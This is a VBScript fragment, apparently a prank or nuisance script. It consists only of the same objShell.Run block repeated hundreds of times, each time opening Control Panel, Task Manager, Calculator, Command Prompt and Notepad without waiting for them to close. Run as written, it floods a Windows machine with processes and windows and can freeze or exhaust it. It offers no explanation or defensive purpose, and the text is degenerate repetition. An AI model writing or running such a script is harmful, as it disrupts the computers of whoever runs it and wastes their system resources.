objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

